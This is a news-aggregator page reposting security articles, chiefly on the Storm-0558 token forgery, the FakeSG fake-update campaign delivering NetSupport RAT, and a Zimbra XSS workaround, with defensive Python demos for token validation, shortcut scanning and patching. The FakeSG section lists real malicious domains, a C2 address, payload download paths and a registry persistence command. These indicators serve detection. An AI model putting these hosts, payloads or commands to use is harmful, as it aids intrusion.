IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Microsoft validation error allowed state actor to access user email of government agencies and others

Microsoft is getting criticized for the way in which it handled a serious security incident that allowed a suspected Chinese espionage group to access user email from approximately 25 organizations, including government agencies and related consumer accounts in the public cloud. The attacks were targeted and lasted for about a month before they were first discovered.

The investigation started on June 16, 2023, when a customer notified Microsoft about anomalous Exchange Online data access. The investigation found that the customer’s Exchange Online data had been accessed using Outlook Web Access (OWA).

Microsoft analysis attributed the activity to a group called Storm-0558 based on established prior tactics, techniques, and procedures (TTPs). Attribution is based on Microsoft Threat Intelligence assessment that Storm-0558 is a China-based threat actor with activities and methods consistent with espionage objectives.

At first Microsoft assumed that the spies were using legitimate Azure Active Directory (Azure AD) tokens stolen by malware. But further analysis showed that Storm-0558 was forging Azure AD tokens using an acquired Microsoft account (MSA) consumer signing key to access OWA and Outlook.com.

This was only possible because of a validation error in Microsoft code. MSA (consumer) keys and Azure AD (enterprise) keys are issued and managed from separate systems and should only be valid for their respective systems. Microsoft says it still doesn’t know how Storm-0558 stole the inactive MSA signing key.

An authentication token allows internet users to access applications, services, websites, and application programming interfaces (APIs) without having to enter their login credentials each time they visit. Instead, the user logs in once, and a unique token is generated and shared with connected applications or websites to verify their identity.

These tokens are validated with a signing key, so an attacker with access to such a key can create valid tokens for the associated services. Because of a design flaw, Storm-0558 was also able to obtain new access tokens by presenting one previously issued by the GetAccessTokenForResource Application Programming Interface (API). That flaw in the API has since been fixed.
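The validation error described above comes down to key scoping: a relying party that verifies a signature against any known key, rather than only the key set for the system it serves, will accept a token signed with a key from the wrong system. The following is an added illustration, not Microsoft's code; it uses a simplified HMAC-signed token format, constructed keys, and made-up issuer labels in place of real Azure AD or MSA issuers.

```python
import base64
import hashlib
import hmac
import json

# Simplified token: base64url(header).base64url(payload).base64url(sig), where sig is
# HMAC-SHA256 over "header.payload" with the key named by the header's "kid". Real Azure AD
# and MSA tokens are RSA-signed JWTs; HMAC keeps this example self-contained. All key
# material, key ids and issuer URLs below are constructed for the demo.
CONSUMER_KEYS = {"msa-key-1": b"consumer-signing-key-constructed"}
ENTERPRISE_KEYS = {"aad-key-1": b"enterprise-signing-key-constructed"}
KEY_SETS = {"consumer": CONSUMER_KEYS, "enterprise": ENTERPRISE_KEYS}
EXPECTED_ISSUER = {
    "consumer": "https://login.consumer.example/",
    "enterprise": "https://login.enterprise.example/tenant-a/",
}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_token(payload: dict, kid: str, key: bytes) -> str:
    """Issue a token the way a token service would: header names the key, body carries claims."""
    header = {"alg": "HS256", "kid": kid}
    signing_input = _b64url(json.dumps(header).encode()) + "." + _b64url(json.dumps(payload).encode())
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def _parse(token: str):
    h, p, s = token.split(".")
    return json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p)), _b64url_decode(s), h + "." + p


def _sig_ok(signing_input: str, sig: bytes, key: bytes) -> bool:
    return hmac.compare_digest(hmac.new(key, signing_input.encode(), hashlib.sha256).digest(), sig)


def validate_weak(token: str, expected_aud: str) -> bool:
    """Flawed validator: resolves 'kid' against a merged view of both key sets, so a token
    signed with a consumer key is accepted by an enterprise service whenever the signature
    itself verifies."""
    header, payload, sig, signing_input = _parse(token)
    all_keys = {**CONSUMER_KEYS, **ENTERPRISE_KEYS}
    key = all_keys.get(header.get("kid"))
    if key is None or not _sig_ok(signing_input, sig, key):
        return False
    return payload.get("aud") == expected_aud


def validate_scoped(token: str, expected_aud: str, system: str) -> bool:
    """Hardened validator: the relying party knows which system it serves ("consumer" or
    "enterprise"), consults only that system's key set, and requires the matching issuer."""
    header, payload, sig, signing_input = _parse(token)
    key = KEY_SETS[system].get(header.get("kid"))
    if key is None or not _sig_ok(signing_input, sig, key):
        return False
    if payload.get("iss") != EXPECTED_ISSUER[system]:
        return False
    return payload.get("aud") == expected_aud


def demo() -> dict:
    """Compare both validators on a consumer-key-signed token that claims enterprise claims."""
    enterprise_claims = {"iss": EXPECTED_ISSUER["enterprise"], "aud": "owa", "sub": "user@tenant-a"}
    consumer_claims = {"iss": EXPECTED_ISSUER["consumer"], "aud": "outlook", "sub": "someone@consumer"}
    wrong_key_set = sign_token(enterprise_claims, "msa-key-1", CONSUMER_KEYS["msa-key-1"])
    legit_enterprise = sign_token(enterprise_claims, "aad-key-1", ENTERPRISE_KEYS["aad-key-1"])
    legit_consumer = sign_token(consumer_claims, "msa-key-1", CONSUMER_KEYS["msa-key-1"])
    return {
        "weak_accepts_wrong_key_set": validate_weak(wrong_key_set, "owa"),
        "scoped_accepts_wrong_key_set": validate_scoped(wrong_key_set, "owa", "enterprise"),
        "scoped_accepts_legit_enterprise": validate_scoped(legit_enterprise, "owa", "enterprise"),
        "scoped_accepts_legit_consumer": validate_scoped(legit_consumer, "outlook", "consumer"),
    }


if __name__ == "__main__":
    print(demo())
```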

When asked, China denied it was involved and basically said people in glass houses shouldn’t throw stones.


“We noted the reports saying that the spokesman for the White House National Security Council claimed that US officials found hackers linked to China took advantage of a security weakness in Microsoft’s cloud-computing to break into unclassified email accounts of the US, and the US has notified Microsoft about this. I would like to say that in the past, it was usually the world’s No.1 hacking group–the US National Security Agency, which also serves as the US Cyber Force Command, that released such kind of disinformation. This time it was the US National Security Council that made a public statement. Whatever agency spoke, it does not change the fact that the US is the world’s biggest hacking empire and global cyber thief.”

What has been done

Microsoft says it has completed mitigation of this attack for all customers and has not found any evidence of further access. The impacted customers have been contacted so no additional customer action is needed to prevent hackers from using the same tactics to access their Exchange or Outlook accounts.

On June 26, OWA stopped accepting tokens issued by GetAccessTokenForResource for renewal, which ended Storm-0558’s ability to use tokens issued from the Azure program.

On June 27, Microsoft blocked the usage of tokens signed with the acquired MSA key in OWA.

On June 29, Microsoft completed replacement of the key to prevent the threat actor from using it to forge new tokens.

Microsoft blocked the use of the stolen private signing key for all impacted customers on July 3, 2023 and says it has “substantially hardened key issuance systems since the acquired MSA key was initially issued.”


Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

FakeSG enters the ‘FakeUpdates’ arena to deliver NetSupport RAT

Over 5 years ago, we began tracking a new campaign that we called FakeUpdates (also known as SocGholish) that used compromised websites to trick users into running a fake browser update. Instead, victims would end up infecting their computers with the NetSupport RAT, allowing threat actors to gain remote access and deliver additional payloads. As we have seen over the years, SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz.

Now, there is a potential new competitor in the “fake updates” landscape that looks strangely familiar. The new campaign, which we call FakeSG, also relies on hacked WordPress websites to display a custom landing page mimicking the victim’s browser. The threat actors are distributing NetSupport RAT either as a zipped download or via an Internet shortcut. While FakeSG appears to be a newcomer, it uses different layers of obfuscation and delivery techniques that make it a threat to take seriously and which could potentially rival SocGholish.

Campaign similarities

We first heard of this new campaign thanks to a Mastodon post by Randy McEoin. The tactics, techniques and procedures (TTPs) are very similar to those of SocGholish and it would be easy to think the two are related. In fact, this chain also leads to NetSupport RAT. However, the template source code is quite different and the payload delivery uses different infrastructure. As a result, we decided to call this variant FakeSG.

Original public discovery

Templates

FakeSG has different browser templates depending on which browser the victim is running. The themed “updates” look very professional and are more up to date than its SocGholish counterpart.

Fake Chrome update

Fake Edge update

Fake Firefox update

Website injections

Compromised websites (WordPress appears to be the top target) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates. The source code is loaded from one of several domains impersonating Google (google-analytiks[.]com) or Adobe (updateadobeflash[.]website):

Malicious code injected into hacked websites

That code contains all the web elements (images, fonts, text) needed to render the fake browser update page. We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self-contained Base64 encoded images.

Source code for Chrome template

Installation flow

There are different installation flows for this campaign, but we will focus on the one that uses a URL shortcut. The decoy installer (Install%20Updater%20(V104.25.151)-stable.url) is an Internet shortcut downloaded from another compromised WordPress site.

Malicious URL shortcut

This shortcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server:

WebDav malicious HTA

This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload (NetSupport RAT).
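The Internet shortcut stage is small enough to be worth a dedicated check: a .url file whose target is a remote script reached over WebDAV (or a file:// URL with a host) has no legitimate reason to exist on a workstation. The following detection routine is an added example, not Malwarebytes’ detection logic; the sample shortcut contents are constructed and use a documentation IP address.

```python
import os
import re
from configparser import ConfigParser
from typing import Optional
from urllib.parse import urlparse

# Inspect Internet shortcut (.url) contents and flag targets that point at a remote script,
# such as an .hta pulled over WebDAV, which is how the FakeSG shortcut retrieves its HTA.
SCRIPT_EXTS = {".hta", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".cmd", ".bat", ".ps1"}

# A UNC target (\\host\share\file, \\host@80\share\file or \\host@SSL\share\file) is resolved
# through the Windows WebDAV redirector when "host" is an HTTP server rather than SMB.
UNC_TARGET = re.compile(r"^\\\\[^\\]+\\")


def parse_url_shortcut(text: str) -> Optional[str]:
    """Return the URL= value of the [InternetShortcut] section, or None if there is none."""
    cp = ConfigParser(interpolation=None, strict=False)  # URLs may contain '%' and duplicate keys
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "internetshortcut" and cp.has_option(section, "url"):
            return cp.get(section, "url").strip().strip('"')
    return None


def classify_target(target: str) -> dict:
    """Decide whether a shortcut target is remote and whether it names a script file."""
    remote, path = False, ""
    if UNC_TARGET.match(target):
        remote, path = True, target.replace("\\", "/")
    else:
        u = urlparse(target)
        if u.scheme.lower() == "file" and u.netloc:
            # file://host/path is also opened via the WebDAV redirector, not the browser
            remote, path = True, u.path
        elif u.scheme.lower() in ("http", "https"):
            remote, path = True, u.path
    ext = os.path.splitext(path)[1].lower()
    return {"remote": remote, "extension": ext, "suspicious": remote and ext in SCRIPT_EXTS}


def scan_shortcut(text: str) -> dict:
    """Parse a .url file's contents and return the target plus its classification."""
    target = parse_url_shortcut(text)
    if target is None:
        return {"target": None, "remote": False, "extension": "", "suspicious": False}
    return {"target": target, **classify_target(target)}


# Constructed samples: two in the FakeSG style (remote .hta over WebDAV), one benign.
SAMPLE_FILE_SCHEME = "[InternetShortcut]\r\nURL=file://203.0.113.10/Downloads/launcher-upd.hta\r\nIconIndex=0\r\n"
SAMPLE_UNC = "[InternetShortcut]\r\nURL=\\\\203.0.113.10@80\\Downloads\\launcher-upd.hta\r\n"
SAMPLE_BENIGN = "[InternetShortcut]\r\nURL=https://www.example.com/\r\n"

if __name__ == "__main__":
    for sample in (SAMPLE_FILE_SCHEME, SAMPLE_UNC, SAMPLE_BENIGN):
        print(scan_shortcut(sample))
```

Point it at the contents of .url files found in Downloads or in mail-client temp folders; a hit on `suspicious` is a strong signal even before the HTA or PowerShell stages run.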

Source of malicious HTA file

Malwarebytes’ EDR shows the full attack chain:

Killchain viewed by Malwarebytes EDR

The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut. The RAT’s main binary is launched from “C:\Users\%username%\AppData\Roaming\BranScale\client32.exe”.

NetSupport RAT

Following a successful infection, callbacks are made to the RAT’s command and control server at 94.158.247[.]27.

Web traffic from full infection

Roommates

Fake browser updates are a very common decoy used by malware authors. In addition to SocGholish, the Domen toolkit was a well-built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases. Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest. Stolen credentials can be resold to other threat actors tied to ransomware gangs.

It is interesting to see another contender in this relatively small space. While there is a very large number of vulnerable websites, we already see some that have been injected with several different pieces of malicious code. From a visitor’s point of view, this means there could be more than one redirect, but the “winner” will be whichever campaign gets its malicious JavaScript to execute first.

We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes. Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks.

EDR detection

Indicators of Compromise (IOCs)

FakeSG infrastructure

178.159.37[.]73
google-analytiks[.]com
googletagmanagar[.]com
updateadobeflash[.]website

WebDav launcher

206[.]71[.]148[.]110
206[.]71[.]148[.]110/Downloads/launcher-upd[.]hta

NetSupport RAT

pietrangelo[.]it/wp-content/uploads/2014/04/BranScale[.]zip
pietrangelo[.]it/wp-content/uploads/2014/04/client32[.]exe

NetSupport RAT C2

94[.]158[.]247[.]27

MITRE ATT&CK techniques

Tactic | ID | Name | Details
Execution | T1059 | Command and Scripting Interpreter | PowerShell used to download payload
Execution | T1059.001 | PowerShell | Starts POWERSHELL.EXE for command execution
Execution | T1059.003 | Windows Command Shell | Starts CMD.EXE for command execution
Privilege escalation | T1548 | Abuse Elevation Control Mechanism | Encoded PowerShell
Privilege escalation | T1548.002 | Bypass User Account Control |
Defense evasion | T1564 | Hide Artifacts | Encoded PowerShell
Defense evasion | T1218 | System Binary Proxy Execution | Drops CMSTP.inf in %temp%
Defense evasion | T1027 | Obfuscated Files or Information | Drops th5epzxc.cmdline in %temp%
Defense evasion | T1112 | Modify Registry | Adds key to registry: HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command /f /ve /t REG_SZ /d C:\Users\admin\AppData\Roaming\BranScale\client32.exe
Defense evasion | T1548 | Abuse Elevation Control Mechanism |
Defense evasion | T1140 | Deobfuscate/Decode Files or Information | Encoded PowerShell
Discovery | T1082 | System Information Discovery | Gets computer name
C&C | T1071 | Application Layer Protocol | NetSupport RAT C2 communication
C&C | T1571 | Non-Standard Port | Destination port: 5051


A week in security (July 10 – 16)

Last week on Malwarebytes Labs:

Stay safe!



Act now! In-the-wild Zimbra vulnerability needs a workaround

Security experts are warning Zimbra users that a vulnerability for which there is no patch is being actively exploited in the wild. In a security update about the vulnerability, the company offered a temporary workaround which users can apply while waiting for a patch to be created.

Zimbra is an open source webmail application used for messaging and collaboration. The vulnerability, which could impact the confidentiality and integrity of users’ data, exists in Zimbra Collaboration Suite Version 8.8.15.

Zimbra is widely used across different industries and government organizations. We reported about a cross-site scripting (XSS) zero-day vulnerability in the Zimbra email platform back in February 2022. At the time, Zimbra claimed there were 200,000 businesses, and over a thousand government and financial institutions, using its software. Thousands of Zimbra mail servers were backdoored in a large scale attack exploiting that vulnerability.

In our June 2023 ransomware review we noted how the MalasLocker ransomware group had targeted vulnerabilities in Zimbra servers, including CVE-2022-24682, to enable remote code execution (RCE). This resulted in MalasLocker taking first place on the list of known attacks over the month of May 2023, displacing perennial top-spot holder LockBit.

Known ransomware attacks by gang, May 2023

Since Zimbra mentions no further details, it is hard to determine what the exact problem is. The proposed fix (see Mitigation below) suggests that the problem may be exploitable using specially crafted XML input. The fn:escapeXml() function escapes characters that could be interpreted as XML markup, so applying it to the parameter manually adds input sanitization.

Zimbra makes no mention of active exploitation, but Google researcher Maddie Stone tweeted about another researcher in the Google Threat Analysis Group noticing the vulnerability being used in-the-wild in a targeted attack.


Earlier vulnerabilities in Zimbra allowed cybercriminals to steal emails in targeted attacks against organizations in the European government and media sectors.

Mitigation

The Zimbra security update suggests you apply the following fix manually on all of your mailbox nodes:

    1. Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto
    2. Then open to edit the active file and go to line number 40
    3. Change
      <input name="st" type="hidden" value="${param.st}"/>
      to
      <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>

Zimbra notes that a service restart is not required so you can do it without any downtime.
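Because the edit has to be repeated on every mailbox node and may be run more than once, it helps to script it so that it checks before it changes anything. The following is an added example, not Zimbra’s tooling: it matches on the vulnerable line’s content rather than on line number 40, keeps a backup, is safe to re-run, and reports one of three states so the same script doubles as a fleet-wide check. The file path and both lines are taken from the advisory above; the backup suffix is my own choice.

```python
import shutil
import tempfile
from pathlib import Path

# Path and replacement text as given in the Zimbra advisory.
MOMOVETO = Path("/opt/zimbra/jetty/webapps/zimbra/m/momoveto")
VULNERABLE = '<input name="st" type="hidden" value="${param.st}"/>'
FIXED = '<input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>'
BACKUP_SUFFIX = ".bak-before-escapexml"  # assumed naming, not from the advisory


def patch_status(text: str) -> str:
    """'vulnerable' if the unescaped input line is present, 'patched' if only the escaped one
    is, 'unknown' if neither appears (different release, or already edited by hand)."""
    if VULNERABLE in text:
        return "vulnerable"
    if FIXED in text:
        return "patched"
    return "unknown"


def apply_fix(path: Path = MOMOVETO) -> str:
    """Back up the file, replace the vulnerable line and return the resulting status.
    Idempotent: an already patched or unrecognised file is left untouched."""
    text = path.read_text(encoding="utf-8")
    status = patch_status(text)
    if status != "vulnerable":
        return status
    backup = path.with_name(path.name + BACKUP_SUFFIX)
    if not backup.exists():  # never overwrite an earlier backup
        shutil.copy2(path, backup)
    path.write_text(text.replace(VULNERABLE, FIXED), encoding="utf-8")
    return patch_status(path.read_text(encoding="utf-8"))


def demo() -> dict:
    """Exercise apply_fix on a constructed copy of the vulnerable JSP in a temp directory."""
    with tempfile.TemporaryDirectory() as d:
        page = Path(d) / "momoveto"
        page.write_text("<html>\n" + VULNERABLE + "\n</html>\n", encoding="utf-8")
        first = apply_fix(page)
        second = apply_fix(page)  # re-run: must report 'patched' without changing anything
        after = page.read_text(encoding="utf-8")
        return {
            "first": first,
            "second": second,
            "backup_kept": (Path(d) / ("momoveto" + BACKUP_SUFFIX)).exists(),
            "line_fixed": FIXED in after and VULNERABLE not in after,
            "unknown_left_alone": patch_status("<html></html>") == "unknown",
        }


if __name__ == "__main__":
    print(demo())  # run as the zimbra user on each node with apply_fix() for the real file
```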

We will keep you posted when a patch is made available and in case there are other developments around this bug.


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Spy vs. spy: Exploring the LetMeSpy hack, with maia arson crimew

The language of a data breach, no matter what company gets hit, is largely the same. There’s the stolen data—be it email addresses, credit card numbers, or even medical records. There are the users—unsuspecting, everyday people who, through no fault of their own, mistakenly put their trust into a company, platform, or service to keep their information safe. And there are, of course, the criminals. Some operate in groups. Some act alone. Some steal data as a means of extortion. Others steal it as a point of pride. All of them, it appears, take something that isn’t theirs. 

But what happens if a cybercriminal takes something that may have already been stolen? 

In late June, a mobile app that can, without consent, pry into text messages, monitor call logs, and track GPS location history, warned its users that its services had been hacked. Email addresses, telephone numbers, and the content of messages were swiped, but how they were originally collected requires scrutiny. That’s because the app itself, called LetMeSpy, is advertised as a parental and employer monitoring app, to be installed on the devices of other people that LetMeSpy users want to track. 

Want to read your child’s text messages? LetMeSpy says it can help. Want to see where they are? LetMeSpy says it can do that, too. What about employers who are interested in the vague idea of “control and safety” of their business? Look no further than LetMeSpy, of course.  

While LetMeSpy’s website tells users that “phone control without your knowledge and consent may be illegal in your country,” (it is in the US and many, many others) the app also claims that it can hide itself from view from the person being tracked. And that feature, in particular, is one of the more tell-tale signs of “stalkerware.” 

Stalkerware is a term used by the cybersecurity industry to describe mobile apps, primarily on Android, that can access a device’s text messages, photos, videos, call records, and GPS locations without the device owner knowing about said surveillance. These types of apps can also automatically record every phone call made and received by a device, turn off a device’s WiFi, and take control of the device’s camera and microphone to snap photos or record audio—all without the victim knowing that their phone has been compromised. 

Stalkerware poses a serious threat—particularly to survivors of domestic abuse—and Malwarebytes has defended users against these types of apps for years. But the hacking of an app with similar functionality raises questions. 

Today, on the Lock and Code podcast with host David Ruiz, we speak with the hacktivist and security blogger maia arson crimew about the data that was revealed in LetMeSpy’s hack, the almost-clumsy efforts by developers to make and market these apps online, and whether this hack—and others in the past—are “good.” 

“I’m the person on the podcast who can say ‘We should hack things,’ because I don’t work for Malwarebytes. But the thing is, I don’t think there really is any other way to get info in this industry.”

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Ransomware making big money through “big game hunting”

Ransomware generates big money for the groups behind it, with new research confirming (some) of the scale of the problem. Chainalysis, a blockchain research firm, looked at data from monitored cryptocurrency wallets, concluding that around $449 million has been taken from victims in the last six months.

As The Record correctly notes, the actual figure will likely be significantly higher because only monitored wallets are included in the study. In terms of what’s going on out there, payments under $1,000 and above $100,000 are both on the up. It’s claimed that ransomware groups could pull in around $900 million in 2023, with the return of “big game hunting” being one of the key factors for the bump.

What is big game hunting? Well, this is the practice of targeting large, financially well-off corporations in order to secure the biggest possible payouts. Even with the increase in attacks on smaller companies, taking on the big entities is where the most enticing payouts are waiting to be had.

As an example of payout sizes, BlackBasta’s 2023 average payment size is $762,634 and its median is $147,106. Cl0p checks in with a $1,730,486 average and a $1,946,335 median. At the other end of the scale the smaller, less sophisticated deployments such as Phobos creep into view with a $1,719 average and a $300 median.

Whatever the size of the payment, the groups are ultimately securing those payments and continuing to make bank. It’s also suspected that as more firms refuse to pay their extortionists, ransomware authors are responding by increasing their ransom demands. The research also notes that additional tactics are being used in cases of non-payment to up the ante further. Threats to leak data, sell it online, break other parts of the business, attack related firms, or even harass employees are all tactics ransomware authors can make use of.

It’s not all doom and gloom where cryptocurrency payments are concerned. With the notable exception of ransomware, cryptocurrency crime across 2023 is in “sharp decline”. Cryptocurrency businesses are getting a handle on scams, users new and old are learning about how to protect their investments, and law enforcement pressure on cryptocurrency fraud is likely having an impact.

Back in the realm of ransomware, things aren’t perhaps quite as good with some of the big hitters from our June ransomware review serving up exploits, dubious “charity donation” requests, and an increase in attacks on education.

Elsewhere, we have students being used to apply pressure to impacted organisations and relentless attacks on schools. It would be unwise to think the scale of ransomware’s day to day impact is in any danger of dropping off anytime soon.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


Tax preparation firms shared sensitive information with Meta

A group of seven US senators has sent a letter to the heads of the IRS, the Department of Justice, the Federal Trade Commission and the IRS watchdog, revealing that they have found evidence that reveals “a shocking breach of taxpayer privacy by tax prep companies and by Big Tech firms.”

According to the letter, information about tens of millions of US taxpayers was sent by three tax preparation firms to social media giant Meta. The letter asked the agencies to immediately open an investigation.

The tax firms used Pixel code on their websites to track and improve their media campaigns. Pixel is an integral part of Meta’s tracking infrastructure which collects data about people online. Data which is eventually used for targeted advertising, tailored content recommendations, and to train its algorithms.

The Pixel code is freely available and designed to help both the website owner and Meta. The code gathered information like names and email addresses, but also more detailed information, including data on users’ income, filing status, refund amounts, and dependents’ college scholarship amounts.

Despite what you might expect, it doesn’t matter whether the person using the tax filing service has an account on Facebook or other platforms operated by Meta.

One of the tax preparation firms stated that they used the Meta Pixel to deliver a more personalized experience for their customers.

“We did NOT know and were never notified that personal tax information was being collected by Facebook from the Pixel.”

Meta, on the other hand stated that it feels it has been clear in its policies that advertisers should not send sensitive information about people through its business tools.

“Doing so is against our policies and we educate advertisers on properly setting up Business tools to prevent this from occurring. Our system is designed to filter out potentially sensitive data it is able to detect.”

With both sides agreeing that this should not have happened, we wholeheartedly agree, but it does not explain why it happened anyway.

The problem was flagged earlier by The Markup. We reported on their Pixel Hunt project in January 2022. The Markup also found Google’s analytics tool on one of the tax preparers’ websites; it didn’t send out any names, although it did send some of the financial information to Google.

The three tax preparation firms mentioned in the letter are H&R Block, TaxAct, and TaxSlayer. The information gathered on the websites of these firms has been sent to Meta over the course of at least two years.

If you don’t want your information to be gathered and shared by trackers, you can use solutions like Malwarebytes Browser Guard, a browser extension that, among others, blocks third-party ad trackers.



Malwarebytes stops 100% of Advanced Threats in latest AV-Test assessment

AV-TEST, a leading independent tester of cybersecurity solutions, has just given Malwarebytes two Advanced awards for the ability of our consumer and business products to protect against the latest attack techniques.

Let’s take a deeper dive into the test and the results.

Advanced Threat Protection test breakdown

AV-Test’s bi-monthly Advanced Threat Protection exam scrutinizes Windows 11 security products, testing their ability to counter new attack methods.

In the April 2023 trial, they assessed defenses against the “Inline Execute Assembly” technique used by data stealers and ransomware. The test involved 10 malware samples sent via spearphishing emails. If not caught early, data stealers could siphon off data, and ransomware could start encrypting data, while communicating with a C2 server. 

Points were given for detecting key attack phases, with a perfect score being 35 points.

In the latest results, both Malwarebytes Premium and Malwarebytes Endpoint Protection aced the test, earning the top “Advanced” rating for detecting 10/10 samples and receiving the full 35/35 points.

Check out the full results: https://www.av-test.org/en/news/advanced-threat-protection-against-the-latest-data-stealers-and-ransomware-techniques/

Advanced test: Enterprise results

Malwarebytes Endpoint Protection successfully detected and blocked all ten instances of malware (5 data stealers and 5 ransomware samples) sent via spearphishing emails in the initial two steps—when they first landed on the system and when they attempted to become active—thereby passing all tests in these phases.


Advanced test: Consumer results

Malwarebytes Premium fared no differently, having also successfully detected and blocked all ten instances of malware when they first landed on the system and attempted to become active.

The foundation for superior Endpoint Detection and Response (EDR)

Malwarebytes Endpoint Protection (EP) is not merely a standalone product; it’s the bedrock of our Malwarebytes Endpoint Detection and Response (EDR) solution.

Leveraging the robust detection and prevention capabilities validated by AV-Test, Malwarebytes EDR constantly monitors endpoint systems and automatically kills processes associated with advanced threat activity. Learn more about our endpoint security solutions.

GET A FREE BUSINESS TRIAL

Learn more about what experts and customers are saying about Malwarebytes:

Malwarebytes recognized as endpoint security leader by G2

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Malwarebytes receives highest rankings in recent third-party tests

Malwarebytes outperforms competition in latest MRG Effitas assessment


Zero-day deploys remote code execution vulnerability via Word documents

An unpatched zero-day vulnerability is currently being abused in the wild, targeting those with an interest in Ukraine. Microsoft reports that CVE-2023-36884 is tied to reports of:

…a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents. An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.

While the CVE is being updated with new information and links to appropriate security information, the Microsoft Security Blog is currently exploring the issue in detail.

This all ties back to a phishing campaign operated by a group being tracked as “Storm-0978” which targets defence and government entities in both Europe and North America. The campaign itself makes use of bait related to the Ukrainian World Congress, a non-profit organisation of “all Ukrainian public organisations in diaspora”.

These infections originate from remote code execution via Word documents using the Ukraine-themed bait described above, as well as an “abuse of vulnerabilities contributing to a security feature bypass”. A fake OneDrive loader delivers a backdoor with similarities to RomCom, the group’s primary backdoor tool. It’s unusual to see websites involved in this kind of attack still online hours after a reveal, but here are some shots we took of both the site and the downloads (thanks to Jerome):

Fake congress website

Word exploit site

Some of the other attacks launched by this group involve distribution of trojanized versions of popular software. Once the backdoor has taken hold, the group “may steal credentials to be used in targeted operations”.

Popular tools used for these installations include trojanized versions of Solarwinds Network Performance Monitor, KeePass, Signal, and Adobe products. Bogus domains imitating the real thing are registered and used as convincing fronts for the infected software.

Microsoft notes that this group also has a hand in ransomware attacks, though it is less targeted in nature and unrelated to any espionage-themed operations. Attacks which have been identified as belonging to Storm-0978 in this realm have impacted finance and telecommunications industries.

A variety of attacks on several fronts, then. 

Microsoft gives the following advice for organisations concerned with the potential threat of compromise from the most recent attacks:

CVE-2023-36884 specific recommendations

  • Customers who use Microsoft Defender for Office 365 are protected from attachments that attempt to exploit CVE-2023-36884.
  • In current attack chains, the use of the Block all Office applications from creating child processes attack surface reduction rule prevents the vulnerability from being exploited.
  • Organizations who cannot take advantage of these protections can set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation.  Please note that while these registry settings would mitigate exploitation of this issue, it could affect regular functionality for certain use cases related to these applications.

You could also consider blocking outbound SMB traffic.



From Malvertising to Ransomware: A ThreatDown webinar recap

Our recent webinar From Malvertising to Ransomware highlights the clear connection between malvertising—the practice of embedding malicious code within legitimate online advertisements—and the epidemic of ransomware attacks affecting businesses globally.

Presented by Mark Stockley, security evangelist at Malwarebytes, and Jerome Segura, Director of Threat Intelligence at Malwarebytes, the webinar explains how malvertising has evolved into an effective entry point in the cyberattack “kill chain.”


By leveraging the broad reach and precision targeting of digital advertising, threat actors can compromise systems, gather valuable credentials, and ultimately lay the groundwork for debilitating ransomware attacks. Speakers mention the Royal ransomware group as just one example of a threat actor using this tactic.

Toward the end of the webinar, the speakers provide a set of tips for protecting businesses from these attacks, including the importance of tools such as Endpoint Detection and Response (EDR) and Managed Detection and Response (MDR) in combatting them.

If you missed the live session, it’s not too late to get the low-down on the malvertising-ransomware connection. Watch the full webinar here to ensure you’re informed and prepared to tackle these nasty threats!

Watch the webinar